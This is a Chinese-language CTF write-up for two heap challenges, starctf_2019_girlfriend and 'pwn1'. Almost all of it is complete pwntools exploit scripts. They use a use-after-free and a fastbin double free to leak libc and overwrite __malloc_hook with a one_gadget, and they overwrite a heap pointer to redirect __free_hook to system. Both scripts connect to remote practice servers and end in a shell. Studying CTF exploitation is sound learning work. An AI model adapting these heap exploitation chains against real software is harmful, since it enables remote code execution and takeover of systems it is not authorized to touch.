others_pwn1&&starctf_2019_girlfriend

starctf_2019_girlfriend

常規的 UAF 漏洞，配合 fastbin attack
exp:

from pwn import *
#p=process('./starctf_2019_girlfriend')
p=remote('node3.buuoj.cn',27758)  # remote instance used by the writeup; the process() line above is the local alternative
elf=ELF('./starctf_2019_girlfriend')
libc=elf.libc  # libc pwntools resolves for the binary; every libc.sym[...] offset below comes from it
def add(size,name,call):
	"""Menu option 1: create an entry with the given size, name and call string."""
	# Prompt/answer pairs, in the order the program asks for them.
	answers = (
		(':', '1'),
		('name', str(size)),
		('name:', name),
		('call:', call),
	)
	for prompt, data in answers:
		p.sendlineafter(prompt, data)

def show(idx):
	"""Menu option 2: print the entry stored at *idx*."""
	choice = '2'
	p.sendlineafter(':', choice)
	p.sendlineafter('index:', str(idx))

def edit():
	"""Menu option 3 (edit); only the menu choice is sent, nothing else is answered."""
	choice = '3'
	p.sendlineafter(':', choice)

def delete(idx):
	"""Menu option 4: free the entry stored at *idx*."""
	for prompt, data in ((':', '4'), ('index:', str(idx))):
		p.sendlineafter(prompt, data)

# Stage 1: five entries; the trailing number is the index the program assigns.
add(0x80,'doudou','137')#0
add(0x18,'doudou1','138')#1
add(0x68,'doudou2','139')#2
add(0x68,'doudou3','140')#3
add(0x20,'doudou4','141')#4
# Free index 0 and show it again: the entry is still readable after delete(),
# which is the UAF the writeup refers to.
delete(0)
show(0)
# Leak parsing: read up to the first 0x7f byte, keep the last 6 bytes, zero-pad
# to 8 and unpack. The leaked value is treated as
# libcbase + __malloc_hook offset + 0x10 + 88 (presumably an unsorted-bin
# pointer into main_arena -- confirm against the libc actually served).
# Written for Python 2 pwntools: str and bytes are one type here, so mixing
# recvuntil() output with '\x00' works; it would not under Python 3.
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['__malloc_hook']-0x10-88
log.success('libcbase: '+hex(libcbase))
malloc_hook=libcbase+libc.sym['__malloc_hook']
# Candidate offsets (presumably one_gadget output for this libc); only index 3 is used.
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libcbase+o_g[3]
realloc=libcbase+libc.sym['__libc_realloc']
# Stage 2: refill index 0, then free index 2 twice with index 3 freed in between.
add(0x80,'doudou5','142')#0
delete(2)
delete(3)
delete(2)
# The name of this 0x68 entry is a packed pointer value (malloc_hook-0x23).
add(0x68,p64(malloc_hook-0x23),'142')
add(0x68,'doudou5','143')
add(0x68,'doudou6','144')
# Name = 11 bytes of padding, then the one_gadget and realloc addresses.
add(0x68,'a'*11+p64(one_gadget)+p64(realloc),'145')
# Start one more allocation by hand (menu 1, size 1); the remaining prompts of
# the add() sequence are deliberately left unanswered.
p.sendlineafter(':','1')
p.sendlineafter('name',str(1))
p.interactive()

others_pwn1

堆塊上有指針，可以直接寫入

from pwn import *
#p=process('./pwn1')
p=remote('node3.buuoj.cn',26982)  # remote instance used by the writeup; the process() line above is the local alternative
elf=ELF('./pwn1')
libc=elf.libc  # libc pwntools resolves for the binary; every libc.sym[...] offset below comes from it
def buy(name,des,man):
	"""Menu option 1: create a record with a name, a description and the 'take?' answer."""
	steps = [
		('>> ', '1'),
		('name :', name),
		('book:', des),
		('take?', man),
	]
	for prompt, data in steps:
		p.sendlineafter(prompt, data)


def show():
	"""Menu option 2: list the records."""
	menu = '2'
	p.sendlineafter('>> ', menu)

def Yedit(idx,name,isdes,des,man):
	"""Menu option 3 with a description update: answers every prompt, including 'book:'."""
	steps = (
		('>> ', '3'),
		('edit?', str(idx)),
		('name :', name),
		('/n)', isdes),
		('book:', des),
		('take?', man),
	)
	for prompt, data in steps:
		p.sendlineafter(prompt, data)

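def Nedit(idx,name,isdes,man):
	"""Menu option 3 without a description update.

	Same prompt sequence as Yedit minus the 'book:' prompt; *isdes* answers the
	'(y/n)' question and the callers in this script pass 'n'.
	"""
	# Indentation normalised to tabs: the original mixed one tab-indented line
	# with 8-space lines, which Python 2 accepts but Python 3 rejects (TabError).
	p.sendlineafter('>> ', '3')
	p.sendlineafter('edit?', str(idx))
	p.sendlineafter('name :', name)
	p.sendlineafter('/n)', isdes)
	p.sendlineafter('take?', man)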

def delete(idx):
	"""Menu option 4: delete the record at *idx*."""
	for prompt, data in (('>> ', '4'), ('delete?', str(idx))):
		p.sendlineafter(prompt, data)
buy('\x11'*4,'\x22'*4,'1')#0
buy('\x33'*4,'\x44'*4,'2')#1
buy('/bin/sh\x00','/bin/sh\x00','3')#2: name and description both '/bin/sh'
# Free record 0, then keep editing it: the program still accepts index 0 after
# delete() (the pointer-on-the-chunk issue the writeup describes).
delete(0)
# Name payload: 9 zero qwords followed by the address of atoi's GOT entry.
payload=p64(0)*9+p64(elf.got['atoi'])
Nedit(0,payload,'n','100')
show()
# Leak parsing: bytes up to the first 0x7f, last 6 kept, padded to 8 with a
# Python 2 str concatenation, then atoi's libc offset subtracted.
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['atoi']
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
# Same payload shape, with __free_hook in place of the GOT entry.
payload=p64(0)*9+p64(free_hook)
Nedit(0,payload,'n','100')
# Record 0's description is set to the packed system address.
Yedit(0,'a','y',p64(system),'1')
show()
# Record 2 is the one created with the '/bin/sh' strings.
delete(2)
p.interactive()